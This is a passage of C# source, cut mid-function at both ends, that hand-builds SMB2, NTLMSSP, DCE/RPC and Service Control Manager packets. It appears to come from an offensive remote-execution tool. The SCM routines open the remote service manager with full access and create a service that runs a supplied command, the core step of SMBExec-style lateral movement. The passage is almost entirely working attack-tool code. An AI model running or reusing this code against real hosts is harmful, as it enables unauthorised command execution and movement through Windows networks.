packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities", new byte[] { 0x40, 0x00, 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount", new byte[] { 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2", new byte[] { 0x00, 0x00 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect", new byte[] { 0x02, 0x02 });
packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2", new byte[] { 0x10, 0x02 });
return packet_SMB2NegotiateProtocolRequest;
}
public static OrderedDictionary SMB2SessionSetupRequest(byte[] packet_security_blob)
{
byte[] packet_security_blob_length = BitConverter.GetBytes(packet_security_blob.Length);
byte[] packet_security_blob_length2 = { packet_security_blob_length[0], packet_security_blob_length[1] };
OrderedDictionary packet_SMB2SessionSetupRequest = new OrderedDictionary();
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize", new byte[] { 0x19, 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags", new byte[] { 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode", new byte[] { 0x01 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset", new byte[] { 0x58, 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength", packet_security_blob_length2);
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer", packet_security_blob);
return packet_SMB2SessionSetupRequest;
}
public static OrderedDictionary SMB2TreeConnectRequest(byte[] packet_path)
{
byte[] packet_path_length = BitConverter.GetBytes(packet_path.Length);
packet_path_length = new byte[] { packet_path_length[0], packet_path_length[1] };
OrderedDictionary packet_SMB2TreeConnectRequest = new OrderedDictionary();
packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize", new byte[] { 0x09, 0x00 });
packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved", new byte[] { 0x00, 0x00 });
packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset", new byte[] { 0x48, 0x00 });
packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength", packet_path_length);
packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer", packet_path);
return packet_SMB2TreeConnectRequest;
}
public static OrderedDictionary SMB2CreateRequestFile(byte[] packet_named_pipe)
{
byte[] packet_named_pipe_length = BitConverter.GetBytes(packet_named_pipe.Length);
byte[] packet_named_pipe_length2 = { packet_named_pipe_length[0], packet_named_pipe_length[1] };
OrderedDictionary packet_SMB2CreateRequestFile = new OrderedDictionary();
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize", new byte[] { 0x39, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags", new byte[] { 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel", new byte[] { 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation", new byte[] { 0x02, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess", new byte[] { 0x03, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes", new byte[] { 0x80, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions", new byte[] { 0x40, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset", new byte[] { 0x78, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength", packet_named_pipe_length2);
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer", packet_named_pipe);
return packet_SMB2CreateRequestFile;
}
public static OrderedDictionary SMB2ReadRequest(byte[] packet_file_ID)
{
OrderedDictionary packet_SMB2ReadRequest = new OrderedDictionary();
packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize", new byte[] { 0x31, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding", new byte[] { 0x50 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags", new byte[] { 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length", new byte[] { 0x00, 0x00, 0x10, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID", packet_file_ID);
packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset", new byte[] { 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength", new byte[] { 0x00, 0x00 });
packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer", new byte[] { 0x30 });
return packet_SMB2ReadRequest;
}
public static OrderedDictionary SMB2WriteRequest(byte[] packet_file_ID, int packet_RPC_length)
{
byte[] packet_write_length = BitConverter.GetBytes(packet_RPC_length);
OrderedDictionary packet_SMB2WriteRequest = new OrderedDictionary();
packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize", new byte[] { 0x31, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset", new byte[] { 0x70, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length", packet_write_length);
packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID", packet_file_ID);
packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset", new byte[] { 0x00, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength", new byte[] { 0x00, 0x00 });
packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
return packet_SMB2WriteRequest;
}
public static OrderedDictionary SMB2CloseRequest(byte[] packet_file_ID)
{
OrderedDictionary packet_SMB2CloseRequest = new OrderedDictionary();
packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize", new byte[] { 0x18, 0x00 });
packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags", new byte[] { 0x00, 0x00 });
packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID", packet_file_ID);
return packet_SMB2CloseRequest;
}
public static OrderedDictionary SMB2TreeDisconnectRequest()
{
OrderedDictionary packet_SMB2TreeDisconnectRequest = new OrderedDictionary();
packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize", new byte[] { 0x04, 0x00 });
packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved", new byte[] { 0x00, 0x00 });
return packet_SMB2TreeDisconnectRequest;
}
public static OrderedDictionary SMB2SessionLogoffRequest()
{
OrderedDictionary packet_SMB2SessionLogoffRequest = new OrderedDictionary();
packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize", new byte[] { 0x04, 0x00 });
packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved", new byte[] { 0x00, 0x00 });
return packet_SMB2SessionLogoffRequest;
}
public static OrderedDictionary NTLMSSPNegotiate(byte[] packet_negotiate_flags, byte[] packet_version)
{
byte[] packet_NTLMSSP_length;
//There may be issues here, we will see.
if (packet_version != null)
{
packet_NTLMSSP_length = BitConverter.GetBytes(32 + packet_version.Length);
}
else
{
packet_NTLMSSP_length = BitConverter.GetBytes(32);
}
byte[] packet_NTLMSSP_length2 = { packet_NTLMSSP_length[0] };
int packet_ASN_length_1 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 32;
byte[] packet_ASN_length_1_2 = (BitConverter.GetBytes(packet_ASN_length_1));
int packet_ASN_length_2 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 22;
byte[] packet_ASN_length_2_2 = (BitConverter.GetBytes(packet_ASN_length_2));
int packet_ASN_length_3 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 20;
byte[] packet_ASN_length_3_2 = (BitConverter.GetBytes(packet_ASN_length_3));
int packet_ASN_length_4 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 2;
byte[] packet_ASN_length_4_2 = BitConverter.GetBytes(packet_ASN_length_4);
OrderedDictionary packet_NTLMSSPNegotiate = new OrderedDictionary();
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID", new byte[] { 0x60 }); // the ASN.1 key names are likely not all correct
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength", new byte[] { packet_ASN_length_1_2[0] });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID", new byte[] { 0x06 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength", new byte[] { 0x06 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID", new byte[] { 0x2b, 0x06, 0x01, 0x05, 0x05, 0x02 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID", new byte[] { 0xa0 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength", new byte[] { packet_ASN_length_2_2[0] });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2", new byte[] { 0x30 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2", new byte[] { packet_ASN_length_3_2[0] });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID", new byte[] { 0xa0 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength", new byte[] { 0x0e });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2", new byte[] { 0x30 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2", new byte[] { 0x0c });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3", new byte[] { 0x06 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3", new byte[] { 0x0a });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType", new byte[] { 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID", new byte[] { 0xa2 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength", new byte[] { packet_ASN_length_4_2[0] });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID", new byte[] { 0x04 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength", new byte[] { packet_NTLMSSP_length2[0] });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags", packet_negotiate_flags);
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
if (packet_version != null)
{
packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version", packet_version);
}
return packet_NTLMSSPNegotiate;
}
public static OrderedDictionary NTLMSSPAuth(byte[] packet_NTLM_response)
{
byte[] packet_NTLMSSP_length = BitConverter.GetBytes(packet_NTLM_response.Length);
packet_NTLMSSP_length = new byte[] { packet_NTLMSSP_length[1], packet_NTLMSSP_length[0] };
byte[] packet_ASN_length_1 = BitConverter.GetBytes(packet_NTLM_response.Length + 12);
byte[] packet_ASN_length_1_2 = { packet_ASN_length_1[1], packet_ASN_length_1[0] };
byte[] packet_ASN_length_2 = BitConverter.GetBytes(packet_NTLM_response.Length + 8);
byte[] packet_ASN_length_2_2 = { packet_ASN_length_2[1], packet_ASN_length_2[0] };
byte[] packet_ASN_length_3 = BitConverter.GetBytes(packet_NTLM_response.Length + 4);
byte[] packet_ASN_length_3_2 = { packet_ASN_length_3[1], packet_ASN_length_3[0] };
OrderedDictionary packet_NTLMSSPAuth = new OrderedDictionary();
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID", new byte[] { 0xa1, 0x82 });
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength", packet_ASN_length_1_2);
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2", new byte[] { 0x30, 0x82 });
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2", packet_ASN_length_2_2);
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3", new byte[] { 0xa2, 0x82 });
packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3", packet_ASN_length_3_2);
packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID", new byte[] { 0x04, 0x82 });
packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength", packet_NTLMSSP_length);
packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse", packet_NTLM_response);
return packet_NTLMSSPAuth;
}
public static OrderedDictionary RPCBind(int packet_call_ID, byte[] packet_max_frag, byte[] packet_num_ctx_items, byte[] packet_context_ID, byte[] packet_UUID, byte[] packet_UUID_version)
{
byte[] packet_call_ID_bytes = BitConverter.GetBytes(packet_call_ID);
OrderedDictionary packet_RPCBind = new OrderedDictionary();
packet_RPCBind.Add("RPCBind_Version", new byte[] { 0x05 });
packet_RPCBind.Add("RPCBind_VersionMinor", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_PacketType", new byte[] { 0x0b });
packet_RPCBind.Add("RPCBind_PacketFlags", new byte[] { 0x03 });
packet_RPCBind.Add("RPCBind_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_FragLength", new byte[] { 0x48, 0x00 });
packet_RPCBind.Add("RPCBind_AuthLength", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_CallID", packet_call_ID_bytes);
packet_RPCBind.Add("RPCBind_MaxXmitFrag", new byte[] { 0xb8, 0x10 });
packet_RPCBind.Add("RPCBind_MaxRecvFrag", new byte[] { 0xb8, 0x10 });
packet_RPCBind.Add("RPCBind_AssocGroup", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_NumCtxItems", packet_num_ctx_items);
packet_RPCBind.Add("RPCBind_Unknown", new byte[] { 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_ContextID", packet_context_ID);
packet_RPCBind.Add("RPCBind_NumTransItems", new byte[] { 0x01 });
packet_RPCBind.Add("RPCBind_Unknown2", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_Interface", packet_UUID);
packet_RPCBind.Add("RPCBind_InterfaceVer", packet_UUID_version);
packet_RPCBind.Add("RPCBind_InterfaceVerMinor", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntax", new byte[] { 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 });
packet_RPCBind.Add("RPCBind_TransferSyntaxVer", new byte[] { 0x02, 0x00, 0x00, 0x00 });
if (packet_num_ctx_items[0] == 2)
{
packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 });
packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a });
packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
}
else if (packet_num_ctx_items[0] == 3)
{
packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 });
packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x33, 0x05, 0x71, 0x71, 0xba, 0xbe, 0x37, 0x49, 0x83, 0x19, 0xb5, 0xdb, 0xef, 0x9c, 0xcc, 0x36 });
packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x02, 0x00 });
packet_RPCBind.Add("RPCBind_NumTransItems3", new byte[] { 0x01 });
packet_RPCBind.Add("RPCBind_Unknown4", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_Interface3", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
packet_RPCBind.Add("RPCBind_InterfaceVer3", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_InterfaceVerMinor3", new byte[] { 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntax3", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_TransferSyntaxVer3", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a });
packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x04 });
packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_ContextID4", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
}
if (packet_call_ID == 3)
{
packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a });
packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x02 });
packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 });
packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
}
return packet_RPCBind;
}
public static OrderedDictionary RPCRequest(byte[] packet_flags, int packet_service_length, int packet_auth_length, int packet_auth_padding, byte[] packet_call_ID, byte[] packet_context_ID, byte[] packet_opnum, byte[] packet_data)
{
int packet_full_auth_length;
byte[] packet_write_length;
byte[] packet_alloc_hint;
if (packet_auth_length > 0)
{
packet_full_auth_length = packet_auth_length + packet_auth_padding + 8;
}
else
{
packet_full_auth_length = 0;
}
if (packet_data != null)
{
packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length + packet_data.Length);
packet_alloc_hint = BitConverter.GetBytes(packet_service_length + packet_data.Length);
}
else
{
packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length);
packet_alloc_hint = BitConverter.GetBytes(packet_service_length);
}
byte[] packet_frag_length = { packet_write_length[0], packet_write_length[1] };
byte[] packet_auth_length2 = BitConverter.GetBytes(packet_auth_length);
byte[] packet_auth_length3 = { packet_auth_length2[0], packet_auth_length2[1] };
OrderedDictionary packet_RPCRequest = new OrderedDictionary();
packet_RPCRequest.Add("RPCRequest_Version", new byte[] { 0x05 });
packet_RPCRequest.Add("RPCRequest_VersionMinor", new byte[] { 0x00 });
packet_RPCRequest.Add("RPCRequest_PacketType", new byte[] { 0x00 });
packet_RPCRequest.Add("RPCRequest_PacketFlags", packet_flags);
packet_RPCRequest.Add("RPCRequest_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
packet_RPCRequest.Add("RPCRequest_FragLength", packet_frag_length);
packet_RPCRequest.Add("RPCRequest_AuthLength", packet_auth_length3);
packet_RPCRequest.Add("RPCRequest_CallID", packet_call_ID);
packet_RPCRequest.Add("RPCRequest_AllocHint", packet_alloc_hint);
packet_RPCRequest.Add("RPCRequest_ContextID", packet_context_ID);
packet_RPCRequest.Add("RPCRequest_Opnum", packet_opnum);
if (packet_data != null && packet_data.Length > 0)
{
packet_RPCRequest.Add("RPCRequest_Data", packet_data);
}
return packet_RPCRequest;
}
//Look into to see if this can be simplified with what we already have.
public static OrderedDictionary SCMOpenSCManagerW(byte[] packet_service, byte[] packet_service_length)
{
byte[] packet_write_length = BitConverter.GetBytes(packet_service.Length + 92);
byte[] packet_frag_length = { packet_write_length[0], packet_write_length[1] };
byte[] packet_alloc_hint = BitConverter.GetBytes(packet_service.Length + 68);
Random r = new Random();
byte[] packet_referent_init = new byte[2];
r.NextBytes(packet_referent_init);
byte[] packet_referent_ID1 = packet_referent_init.Concat(new byte[] { 0x00, 0x00 }).ToArray();
byte[] packet_referent_init2 = new byte[2];
r.NextBytes(packet_referent_init2);
byte[] packet_referent_ID2 = packet_referent_init2.Concat(new byte[] { 0x00, 0x00 }).ToArray();
OrderedDictionary packet_SCMOpenSCManagerW = new OrderedDictionary();
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID", packet_referent_ID1);
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount", packet_service_length);
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount", packet_service_length);
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName", packet_service);
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_ReferentID", packet_referent_ID2);
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameMaxCount", new byte[] { 0x0f, 0x00, 0x00, 0x00 });
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameActualCount", new byte[] { 0x0f, 0x00, 0x00, 0x00 });
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database", new byte[] { 0x53, 0x00, 0x65, 0x00, 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x41, 0x00, 0x63, 0x00, 0x74, 0x00, 0x69, 0x00, 0x76, 0x00, 0x65, 0x00, 0x00, 0x00 });
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Unknown", new byte[] { 0xbf, 0xbf });
packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_AccessMask", new byte[] { 0x3f, 0x00, 0x00, 0x00 });
return packet_SCMOpenSCManagerW;
}
public static OrderedDictionary SCMCreateServiceW(byte[] packet_context_handle, byte[] packet_service, byte[] packet_service_length, byte[] packet_command, byte[] packet_command_length)
{
Random r = new Random();
byte[] packet_referent_init = new byte[2];
r.NextBytes(packet_referent_init);
byte[] nulls = { 0x00, 0x00 };
byte[] packet_referent_ID = new byte[4];
Buffer.BlockCopy(packet_referent_init, 0, packet_referent_ID, 0, packet_referent_init.Length);
Buffer.BlockCopy(nulls, 0, packet_referent_ID, packet_referent_init.Length, nulls.Length);
OrderedDictionary packet_SCMCreateServiceW = new OrderedDictionary();
packet_SCMCreateServiceW.Add("SCMCreateServiceW_ContextHandle", packet_context_handle);
packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_MaxCount", packet_service_length);
packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_ActualCount", packet_service_length);
packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName", packet_service);
